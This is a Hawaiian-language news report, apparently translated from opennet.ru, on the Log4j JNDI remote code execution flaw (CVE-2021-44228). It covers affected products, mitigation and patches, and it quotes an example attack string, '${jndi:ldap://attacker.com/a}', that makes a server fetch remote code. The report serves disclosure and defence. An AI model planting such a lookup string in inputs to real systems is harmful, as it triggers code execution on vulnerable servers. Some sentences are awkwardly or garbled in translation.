Ma Apache Log4j, kahi hoʻolālā kaulana no ka hoʻonohonoho ʻana i ka hoʻopaʻa inoa ʻana i nā noi Java, ua ʻike ʻia kahi nāwaliwali koʻikoʻi e hiki ai ke hoʻokō ʻia ke code arbitrary i ka wā i kākau ʻia ai kahi waiwai i hoʻohālikelike ʻia i ka format "{jndi:URL}" i ka log. Hiki ke hoʻokō ʻia ka hoʻouka ʻana ma nā noi Java e hoʻopaʻa inoa i nā waiwai i loaʻa mai nā kumu waho, no ka laʻana, i ka wā e hōʻike ana i nā koina pilikia i nā memo hewa.
Hoʻomaopopo ʻia ʻaneʻane nā papahana āpau e hoʻohana ana i nā frameworks e like me Apache Struts, Apache Solr, Apache Druid a i ʻole Apache Flink e hoʻopilikia ʻia e ka pilikia, me ka Steam, Apple iCloud, nā mea kūʻai aku Minecraft a me nā kikowaena. Ua manaʻo ʻia e hiki i ka nāwaliwali ke alakaʻi i kahi nalu o ka hoʻouka nui ʻana i nā noi ʻoihana, e hana hou ana i ka mōʻaukala o nā nāwaliwali koʻikoʻi i ka ʻōnaehana Apache Struts, e like me ka manaʻo koʻikoʻi, hoʻohana ʻia i nā noi pūnaewele e 65% o Fortune. ʻO nā hui 100 me nā ho'āʻo e nānā i ka pūnaewele no nā ʻōnaehana nāwaliwali.
Hoʻonui ʻia ka pilikia ma ka ʻoiaʻiʻo ua paʻi ʻia kahi hana hana, akā ʻaʻole i hoʻonohonoho ʻia nā hoʻoponopono no nā lālā paʻa. ʻAʻole i hāʻawi ʻia ka mea hōʻike CVE. Hoʻokomo wale ʻia ka hoʻoponopono i ka lālā hoʻāʻo log4j-2.15.0-rc1. Ma ke ʻano he hana no ka pale ʻana i ka nāwaliwali, pono e hoʻonohonoho i ka log4j2.formatMsgNoLookups parameter i ka ʻoiaʻiʻo.
Ua hoʻokumu ʻia ka pilikia ma muli o ke kākoʻo ʻana o log4j i ka hana ʻana i nā masks kūikawā "{}" i nā laina i hoʻopuka ʻia i ka log, kahi e hiki ai ke hoʻokō ʻia nā nīnau JNDI (Java Naming and Directory Interface). Hoʻomaka ka hoʻouka ʻana i ke kau ʻana i kahi kaula me ka hoʻololi ʻana "${jndi:ldap://attacker.com/a}", ma ka hana ʻana a log4j e hoʻouna i kahi noi LDAP no ke ala i ka papa Java i ka server attacker.com. . ʻO ke ala i hoʻihoʻi ʻia e ke kikowaena o ka mea hoʻouka (e laʻa, http://second-stage.attacker.com/Exploit.class) e hoʻouka ʻia a hoʻokō ʻia i loko o ka pōʻaiapili o ke kaʻina hana o kēia manawa, e hiki ai i ka mea hoʻouka ke hoʻokō i nā code arbitrary ma ka pūnaewele me nā kuleana o ka noi o kēia manawa.
Pākuʻi 1: Ua hāʻawi ʻia ka mea palupalu i ka CVE-2021-44228.
Pākuʻi 2: Ua ʻike ʻia kahi ala e kāpae ai i ka pale i hoʻohui ʻia e ka hoʻokuʻu ʻana i ka log4j-2.15.0-rc1. Ua hoʻolauna ʻia kahi mea hou, log4j-2.15.0-rc2, me ka pale piha ʻana i ka nāwaliwali. Hōʻike ke code i ka hoʻololi e pili ana me ka ʻole o ka hoʻopau ʻokoʻa i ka hihia o ka hoʻohana ʻana i kahi URL JNDI i hoʻonohonoho hewa ʻia.
Source: opennet.ru